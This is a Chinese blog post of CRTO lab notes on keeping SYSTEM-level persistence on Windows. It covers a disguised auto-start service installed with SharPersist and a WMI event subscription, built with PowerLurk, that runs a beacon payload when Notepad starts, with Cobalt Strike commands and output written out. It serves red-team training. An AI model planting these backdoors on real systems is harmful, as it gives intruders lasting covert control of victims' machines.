51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

CRTO | 主机持久化-已更新

本章主要介绍获得SYSTEM权限后的持久化技术,主要是Windows服务和WMI事件订阅

1-概述

在之前章节"主机持久化"中,主要说明如何在用户环境中获取持久化。但是,在提升主机上的权限后,我们还可以添加持久性机制来维护 SYSTEM 访问权限。这样就可以保持对计算机的提升访问权限,而无需再次利用漏洞(因为漏洞可能会在以后被修补或修复),条件是必须在高完整性的 Beacon 中操作

注意:实验环境中有代理设置,SYSTEM 进程无法向 Web 代理进行身份验证,因此不能使用 HTTP Beacons,需要改用 P2P 或 DNS Beacons

2-Windows服务

正如我们在之前章节看到的,有许多 Windows 服务以 SYSTEM 身份运行。我们利用服务进行权限提升的各种手段也可以起到持久化的作用,但代价是破坏合法服务。相反,我们可以创建自己的服务,而不会影响现有的服务

    beacon> cd C:\Windowsbeacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

[*] INFO: Adding service persistence
[*] INFO: Command: C:\Windows\legit-svc.exe
[*] INFO: Command Args: 
[*] INFO: Service Name: legit-svc

[+] SUCCESS: Service persistence added

这将创建一个处于 STOPPED 状态的新服务,但 START_TYPE 设置为 AUTO_START。这意味着服务在计算机重新启动之前不会运行。当计算机启动时,服务也会启动,并且它将等待连接

3-WMI 事件订阅

通过利用以下三种方式,可以实现 WMI 事件实现的持久化:

EventConsumer(事件消费者)
EventFilter(事件过滤器)
FilterToConsumerBinding(过滤器到消费者绑定)

EventConsumer 是想要执行的操作,也就是执行有效负载,可以通过 OS 命令(例如 PowerShell一句话)或 VBScript 来实现

EventFilter 是可以采取行动的触发器,任何任意 WMI 查询都可以用作过滤器,它提供几乎无限的选项。这些选项可以包括特定进程启动时、用户登录时、插入 USB 设备时、一天中的任何特定时间或时间间隔

FilterToConsumerBinding 是将 EventConsumer 和 EventFilter 链接在一起

PowerLurk(https://github.com/Sw4mpf0x/PowerLurk)是一个用于构建这些 WMI 事件的 PowerShell 工具

首先将 DNS 有效负载上传到 Windows 目录,导入 PowerLurk.ps1 并创建一个新的 WMI 事件订阅,该订阅将在启动记事本时执行。

    beacon> cd C:\Windowsbeacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

之后可以使用Get-WmiEvent -Name WmiBackdoor查看这些订阅

EventConsumer的CommandLineTemplate为C:\Windows\dns_x64.exe

EventFilter 的查询语句是SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'

在Workstation 2上打开记事本,DNS Beacon 将会上线

可以使用Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject命令来删除后门


赞(6)
未经允许不得转载:工具盒子 » CRTO | 主机持久化-已更新